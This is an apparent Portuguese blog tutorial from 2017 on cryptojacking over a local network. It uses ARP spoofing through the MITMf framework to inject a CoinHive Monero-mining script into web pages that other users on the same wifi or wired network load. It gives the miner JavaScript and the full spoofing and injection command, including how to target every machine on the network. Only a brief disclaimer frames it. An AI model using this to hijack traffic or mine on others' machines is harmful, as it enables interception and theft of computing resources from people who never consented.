If you continue to use this site, you consent to our Privacy Policy.

20 dezembro 2017

Injetando script minerador pelo wifi ou ethernet


O tutorial a seguir tem o intuito apenas educacional, não nos responsabilizamos pelos seus atos ou o de nossa audiência.

Hoje demonstraremos para vocês um tutorial de como minerar criptomoedas (no caso a XMR - monero) utilizando o poder de processamento de máquinas que estejam em sua rede local, seja cabeada ou wireless (wifi).

*Caso deseja entender mais sobre criptomoedas como Bitcoin e outras, confira nossa série de artigos sobre Moedas do futuro clicando aqui.

O primeiro passo é ter instalado e configurado o framework MITMf, clique aqui para acessar a página do github deles, se preferir assista nosso tutorial abaixo de como baixar ele na distribuição Kali Linux.



Depois é necessário que tenha uma conta no CoinHive, clique aqui e saiba como cadastrar e ter acesso a sua KEY - lá tem mais informações sobre as opções de personalização do script que utilizaremos.


Com sua KEY em mãos, abra seu editor de texto preferido e cole o seguinte código:

var miner = new CoinHive.Anonymous('SUA-KEY', { throttle: 0.7 });miner.start();

Substitua o trecho 'SUA-KEY' (mantenha as aspas simples) pela KEY que você encontra em sua conta no CoinHive. Salve o arquivo de texto no formato .js e agora bora acompanhar o tutorial em vídeo abaixo de como injetar um código javascript (sim, o tutorial serve para outros códigos javascripts também) nas páginas da internet visitadas pelo alvo.


Esquecemos de mencionar que não funciona com páginas HTTPS da forma como é apresentado no vídeo, para isso é necessário alguns passos a mais que não abordamos ainda.

Para quem deseja injetar o script em todos os computadores da rede, basta digitar o comando da seguinte forma:


python mitm.py -i interface --spoof --arp --gateway roteador --inject --js-file arquivo.js  --js-url https://coinhive.com/lib/coinhive.min.js

Ou seja, basta omitir o trecho --target ip-alvo .




~ Artigos recomendados para você:









Please Donate To Bitcoin Address: [[address]]





Donation of [[value]] BTC Received. Thank You.


[[error]]